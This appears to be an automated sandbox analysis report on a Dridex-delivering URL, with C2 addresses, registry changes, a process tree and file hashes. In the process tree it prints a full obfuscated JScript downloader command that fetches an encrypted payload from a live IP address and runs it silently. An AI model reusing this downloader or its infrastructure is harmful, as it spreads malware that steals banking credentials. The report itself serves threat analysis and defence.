Analysis

max time kernel: 70s
max time network: 143s
platform: windows10_x64
resource: win10v20210410
submitted: 01-07-2021 05:48

Static task: static1
URLScan task: urlscan1
Sample: https://exitmagall.xyz/iduew73

Behavioral task: behavioral1
Sample: https://exitmagall.xyz/iduew73
Resource: win7v20210408

General

Malware Config

Extracted
Family: dridex
Botnet: 10111
C2:
104.168.155.129:443
142.4.219.173:4664
176.31.117.84:9443
Signatures

Processes:
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\9ilqj.exe | cryptone
C:\Users\Admin\AppData\Local\Temp\9ilqj.exe | cryptone

Blocklisted process makes network request (1 IoCs)
Processes:
flow | pid | process
25 | 2152 | wscript.exe

Executes dropped EXE (1 IoCs)
Processes:
pid | process
3936 | 9ilqj.exe

Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Processes:
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | 9ilqj.exe
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

Processes:
description | ioc | process
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Telligent | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 3 | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate\NextUpdateDate = "331899855" | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateLowDateTime = "1177650819" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30895676" | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$Discuz! | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | IEXPLORE.EXE
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLLowDateTime = "1251635200" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastUpdateHighDateTime = "30895676" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1186245752" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\ | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$blogger | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{7143C6D7-DA2F-11EB-A11C-7280A1B46CD1} = "0" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$vBulletin 4 | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\FileVersion = "2016061511" | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateHighDateTime = "30895676" | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\NextUpdateDate = "331931847" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$WordPress | iexplore.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$MediaWiki | iexplore.exe
Set value (data) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\FlipAhead\Meta\generator$http://www.typepad.com/ | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastTTLHighDateTime = "50" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager\LastCheckForUpdateLowDateTime = "1177650819" | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\VersionManager | IEXPLORE.EXE
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\HistoryJournalCertificate | iexplore.exe
Key created | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" | iexplore.exe
Set value (int) | \REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "331883262" | iexplore.exe
Suspicious behavior: GetForegroundWindowSpam (1 IoCs)
Processes:
pid | process
3904 | iexplore.exe

Suspicious use of FindShellTrayWindow (1 IoCs)
Processes:
pid | process
3904 | iexplore.exe

Suspicious use of SetWindowsHookEx (6 IoCs)
Processes:
pid | process
3904 | iexplore.exe
3904 | iexplore.exe
412 | IEXPLORE.EXE
412 | IEXPLORE.EXE
412 | IEXPLORE.EXE
412 | IEXPLORE.EXE

Suspicious use of WriteProcessMemory (15 IoCs)
Processes:
description | pid | process | target process
PID 3904 wrote to memory of 412 | 3904 | iexplore.exe | IEXPLORE.EXE
PID 3904 wrote to memory of 412 | 3904 | iexplore.exe | IEXPLORE.EXE
PID 3904 wrote to memory of 412 | 3904 | iexplore.exe | IEXPLORE.EXE
PID 412 wrote to memory of 3332 | 412 | IEXPLORE.EXE | cmd.exe
PID 412 wrote to memory of 3332 | 412 | IEXPLORE.EXE | cmd.exe
PID 412 wrote to memory of 3332 | 412 | IEXPLORE.EXE | cmd.exe
PID 3332 wrote to memory of 2152 | 3332 | cmd.exe | wscript.exe
PID 3332 wrote to memory of 2152 | 3332 | cmd.exe | wscript.exe
PID 3332 wrote to memory of 2152 | 3332 | cmd.exe | wscript.exe
PID 2152 wrote to memory of 2704 | 2152 | wscript.exe | cmd.exe
PID 2152 wrote to memory of 2704 | 2152 | wscript.exe | cmd.exe
PID 2152 wrote to memory of 2704 | 2152 | wscript.exe | cmd.exe
PID 2704 wrote to memory of 3936 | 2704 | cmd.exe | 9ilqj.exe
PID 2704 wrote to memory of 3936 | 2704 | cmd.exe | 9ilqj.exe
PID 2704 wrote to memory of 3936 | 2704 | cmd.exe | 9ilqj.exe
Processes

1. C:\Program Files\Internet Explorer\iexplore.exe
   Command line: "C:\Program Files\Internet Explorer\iexplore.exe" https://exitmagall.xyz/iduew73
   - Modifies Internet Explorer settings
   - Suspicious behavior: GetForegroundWindowSpam
   - Suspicious use of FindShellTrayWindow
   - Suspicious use of SetWindowsHookEx
   - Suspicious use of WriteProcessMemory

  2. C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
     Command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:3904 CREDAT:82945 /prefetch:2
     - Modifies Internet Explorer settings
     - Suspicious use of SetWindowsHookEx
     - Suspicious use of WriteProcessMemory

    3. C:\Windows\SysWOW64\cmd.exe
       Command line: cmd.exe /q /c cd /d "%tmp%" && echo function O(l){return Math.random().toString(36).slice(-5)};function V(k){var y=Q;y["set"+"Proxy"](n);y.open("GET",k(1),1);y.Option(n)=k(2);y.send();y/*XASX1ASXASS*/["Wait"+"ForResponse"]();if(200==y.status)return _(y.responseText,k(n))};function _(k,e){for(var l=0,n,c=[],F=256-1,S=String,q=[],b=0;256^>b;b++)c[b]=b;for(b=0;256^>b;b++)l=l+c[b]+e["cha"+"rCodeAt"](b%e.length)^&F,n=c[b],c[b]=c[l],c[l]=n;for(var p=l=b=0;p^<k.length;p++)b=b+1^&F,l=l+c[b]^&F,n=c[b],c[b]=c[l],c[l]=n,q.push(S.fromCharCode(k.charCodeAt(p)^^c[c[b]+c[l]^&F]));return q.join("")};try{var u=WScript.Echo(),o="Object",A=Math,a=Function("b","return WScript.Create"+o+"(b)");P=(""+WScript).split(" ")[1],M="indexOf",q=a(P+"ing.FileSystem"+o),m=WScript.Arguments,e="WinHTTP",Z="cmd",Q=a("WinH"+"ttp.WinHttpRequest.5.1"),j=a("W"+P+".Shell"),s=a("ADODB.Stream"),x=O(8)+".",p="exe",n=0,K=WScript[P+"FullName"],E="."+p;Y="Type";s[Y]=2;s.Charset="iso-8859-1";s.Open();try{v=V(m)}catch(W){v=V(m)};d=v.charCodeAt(027+v[M]("PE\x00\x00"));s.WriteText(v);if(32-1^<d){var z=1;x+="dll"}else x+=p;s.savetofile(x,2);s.Close();z^&^&(x="regsvr"+32+E+" /s "+x);j.run(Z+E+" /c "+x,0)}catch(xXASXASSAA){};q.Deletefile(K);>3.tMp && stArt wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://45.138.24.31/?Mjk4MDgx&MNNPx&end=twix&start=why&yus=80spinny.127zg59.406q1z8o8&s2hdfgdfgt4=6NbP0zYA0SD2Izfz-3ORZ_xOWPPk7DPRAOzrl-CelzSp_B8JOQFOwLli0HSfwczlIpYUlkV8q-qh0KBzx6c0ZaC9BzbUQhG96LIVLA46A&oafghc1n4=w3_QMvXcJx3QFYPJKfncT&ZkdSDjMTYwOTA=" "2"
       - Suspicious use of WriteProcessMemory

      4. C:\Windows\SysWOW64\wscript.exe
         Command line: wsCripT //B //E:JScript 3.tMp "hmX1ZyZgd" "http://45.138.24.31/?Mjk4MDgx&MNNPx&end=twix&start=why&yus=80spinny.127zg59.406q1z8o8&s2hdfgdfgt4=6NbP0zYA0SD2Izfz-3ORZ_xOWPPk7DPRAOzrl-CelzSp_B8JOQFOwLli0HSfwczlIpYUlkV8q-qh0KBzx6c0ZaC9BzbUQhG96LIVLA46A&oafghc1n4=w3_QMvXcJx3QFYPJKfncT&ZkdSDjMTYwOTA=" "2"
         - Blocklisted process makes network request
         - Suspicious use of WriteProcessMemory

        5. C:\Windows\SysWOW64\cmd.exe
           Command line: "C:\Windows\System32\cmd.exe" /c 9ilqj.exe
           - Suspicious use of WriteProcessMemory

          6. C:\Users\Admin\AppData\Local\Temp\9ilqj.exe
             Command line: 9ilqj.exe
             - Executes dropped EXE
             - Checks whether UAC is enabled
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
MD5 89b2cc9646a78de14893d414780a853f
SHA1 866a2d80b1eb0e821e873430d9962e67fadeff19
SHA256 8f5e476d223b4fa079d065225975fea02c5e716cc63048fafb387486f83a3f7b
SHA512 811ff553b3e6635fff8dc9a62c1251b2c5c271444cfa2672e1159ffcf98bd62c74056135453f8534bf228eb95b2d7b0fcc04de079db6ea621f9e6e27dd5725e4

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776
MD5 b8b651f620bb1c2e89be9b3be78e307a
SHA1 1a4f54890eb90b63933d3ed5284fc84a6f28167e
SHA256 3c665e9dda2dd7673ea723c1e49611af19639982529f58fd44da03500430264d
SHA512 f6a7a8452c202a301eb719be18c9458ab4a2dcdb6248238294a787bfd1ca6ab0e0df6c37a9912aafad930ed85770b92b03c8ca99c6409c3f65c6a3345b74c9d2

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\A91D2DM4.cookie
MD5 2d9862a2f7f5926eb0d94326c779f64a
SHA1 fee2e1297f1dfe1abc7eb263cd1a894e0e82ca27
SHA256 3f910d4b153df236720e538c46e222344d4835224dd6bfea6c473cf4eefe5a9f
SHA512 56ff07fbfb1b12411404bb932a3cc4fa1a81e476a777d36fb31654b1422f3a2152e88dd198fc20160be01edc9cca1e807d4e54b9283d9aa296bdb692afad230d

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCookies\MQX7LDGQ.cookie
MD5 778e71e3c6b9ceb52140bbff5d896e95
SHA1 94973e356b5566b09290880103a3f3eff14b361b
SHA256 8f8715dbf6a00cee529ca8fa295a2552488c072a535bb4b790587ffa5f35b592
SHA512 65716acd610c204c604ee0f1de119d8267af501945575d106124d80a1d970b85b2eea2941f9a8efc1e56bc319d49181f4787ef3b632273fb3c80216041efa4ea

C:\Users\Admin\AppData\Local\Temp\3.tMp
MD5 60fc00422b399db85f87d41b8328976d
SHA1 bb85034acad8025f97e5bb236443debaf8926e4b
SHA256 c38eb3965155b143c8d72bf219ec6dd985a106ce0776c272470b0019e74fb690
SHA512 16fa1a3c187500b5c3867fa05752428496273b73c2960c54d2e34e4833a057392c1f5469c8824fdc3d29c9ece2e65189ee281638ccaae941437a259192591151

C:\Users\Admin\AppData\Local\Temp\9ilqj.exe
MD5 d4f2b07163622ec627b822181dacc7de
SHA1 4cd7f98608e23f0466cd07963a10b14b7f9deca0
SHA256 abe0f535bac505b567371572e6babab960e6abead6051340d04560c2f343d31c
SHA512 3a35a562cf6fb245dce6917c42fc0d84c913fee6d15c33322842c211fe1b1e6a88b4ceeaca492c50bb877e4926dd6683fd440f91646f4547077236c2e8434eee
memory/412-115-0x0000000000000000-mapping.dmp

memory/2152-117-0x0000000000000000-mapping.dmp

memory/2704-119-0x0000000000000000-mapping.dmp

memory/3332-116-0x0000000000000000-mapping.dmp

memory/3904-114-0x00007FF858480000-0x00007FF8584EB000-memory.dmp
Filesize 428KB

memory/3936-123-0x0000000000560000-0x000000000059C000-memory.dmp
Filesize 240KB

memory/3936-124-0x0000000000400000-0x0000000000508000-memory.dmp
Filesize 1.0MB

memory/3936-120-0x0000000000000000-mapping.dmp